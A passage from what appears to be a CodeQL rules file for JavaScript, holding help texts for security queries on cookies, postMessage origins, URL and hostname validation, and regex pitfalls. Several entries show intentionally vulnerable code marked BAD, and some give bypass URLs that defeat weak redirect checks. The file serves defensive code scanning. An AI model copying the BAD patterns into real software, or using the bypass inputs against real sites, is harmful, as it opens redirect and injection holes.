');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", + "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], + "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", + "id" : "js/clear-text-cookie", + "kind" : "problem", + "name" : "Clear text transmission of sensitive cookie", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/cross-window-information-leak", + "name" : "js/cross-window-information-leak", + "shortDescription" : { + "text" : "Cross-window communication with unrestricted target origin" + }, + "fullDescription" : { + "text" : "When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-201", "external/cwe/cwe-359" ], + "description" : "When sending sensitive information to another window using `postMessage`,\n the origin of the target window should be restricted to avoid unintentional\n information leaks.", + "id" : "js/cross-window-information-leak", + "kind" : "path-problem", + "name" : "Cross-window communication with unrestricted target origin", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "4.3" + } + }, { + "id" : "js/incomplete-url-substring-sanitization", + "name" : "js/incomplete-url-substring-sanitization", + "shortDescription" : { + "text" : "Incomplete URL substring sanitization" + }, + "fullDescription" : { + "text" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.", + "id" : "js/incomplete-url-substring-sanitization", + "kind" : "problem", + "name" : "Incomplete URL substring sanitization", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-hostname-regexp", + "name" : "js/incomplete-hostname-regexp", + "shortDescription" : { + "text" : "Incomplete regular expression for hostnames" + }, + "fullDescription" : { + "text" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.", + "id" : "js/incomplete-hostname-regexp", + "kind" : "problem", + "name" : "Incomplete regular expression for hostnames", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incorrect-suffix-check", + "name" : "js/incorrect-suffix-check", + "shortDescription" : { + "text" : "Incorrect suffix check" + }, + "fullDescription" : { + "text" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020" ], + "description" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.", + "id" : "js/incorrect-suffix-check", + "kind" : "problem", + "name" : "Incorrect suffix check", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/useless-regexp-character-escape", + "name" : "js/useless-regexp-character-escape", + "shortDescription" : { + "text" : "Useless regular-expression character escape" + }, + "fullDescription" : { + "text" : "Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Prepending a backslash to an ordinary character in a string\n does not have any effect, and may make regular expressions constructed from this string\n behave unexpectedly.", + "id" : "js/useless-regexp-character-escape", + "kind" : "problem", + "name" : "Useless regular-expression character escape", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/overly-large-range", + "name" : "js/overly-large-range", + "shortDescription" : { + "text" : "Overly permissive regular expression range" + }, + "fullDescription" : { + "text" : "Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Overly permissive regular expression ranges match a wider range of characters than intended.\n This may allow an attacker to bypass a filter or sanitizer.", + "id" : "js/overly-large-range", + "kind" : "problem", + "name" : "Overly permissive regular expression range", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/incomplete-url-scheme-check", + "name" : "js/incomplete-url-scheme-check", + "shortDescription" : { + "text" : "Incomplete URL scheme check" + }, + "fullDescription" : { + "text" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n", + "markdown" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = 